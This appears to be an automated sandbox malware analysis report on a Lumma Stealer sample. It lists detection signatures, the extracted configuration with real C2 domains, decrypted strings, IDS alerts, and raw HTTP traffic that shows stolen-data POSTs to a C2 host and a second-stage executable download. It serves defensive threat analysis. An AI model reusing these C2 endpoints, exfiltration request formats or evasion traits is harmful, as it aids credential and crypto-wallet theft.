Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543207
MD5: 84eeaf8b6dac33d7e5de9256769ca8c8
SHA1: eb1e3025548095128a6602d062d180192e7e88b1
SHA256: 58700ccf44cdd5f10ce7711543d93401dcd4e6328195173d25ffc6eba42bddc7
Tags: exeuser-Bitsight
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: file.exe.1400.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "presticitpo.store", "crisiwarny.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: scriptyprefej.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: navygenerayk.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: founpiuer.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: necklacedmny.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: thumbystriw.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: fadehairucw.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: crisiwarny.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: presticitpo.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: presticitpo.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: Workgroup: -
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: 4SD0y4--legendaryy
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000003.2276067053.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmp

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49710 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 104.21.95.91:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: fadehairucw.store
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 27 Oct 2024 11:13:16 GMTContent-Type: application/octet-streamContent-Length: 2720768Last-Modified: Sun, 27 Oct 2024 10:07:55 GMTConnection: keep-aliveETag: "671e10fb-298400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 3f 26 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 63 6b 6a 69 76 78 73 00 40 29 00 00 a0 00 00 00 22 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 71 66 7a 64 79 6f 73 00 20 00 00 00 e0 29 00 00 06 00 00 00 5c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 62 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.95.91 104.21.95.91
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49712 -> 185.215.113.16:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1247Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568574Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/B
Source: file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261446385.000000000133A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeM
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exev
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microP
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2111402565.0000000005E29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253655039.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109641062.0000000005E34000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141585744.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142747663.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2263039938.00000000017FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142625341.00000000017F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000003.2155306590.00000000017FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/0
Source: file.exe, 00000000.00000003.2111053218.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2110280342.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109706634.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109984852.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/5e9f
Source: file.exe, 00000000.00000003.2141585744.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142747663.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142625341.00000000017F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/Y
Source: file.exe, 00000000.00000003.2129448417.00000000017DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/a
Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/alt-
Source: file.exe, file.exe, 00000000.00000003.2141625871.00000000017ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083678993.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141499215.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000003.2155306590.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253538805.00000000017E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253697863.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api3
Source: file.exe, 00000000.00000003.2124393205.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125805969.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2148529577.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129029760.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141448822.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127812697.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126194869.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126017190.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128672323.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127070717.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125616453.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128020421.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129262094.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126680781.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129756991.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253187496.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155177011.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 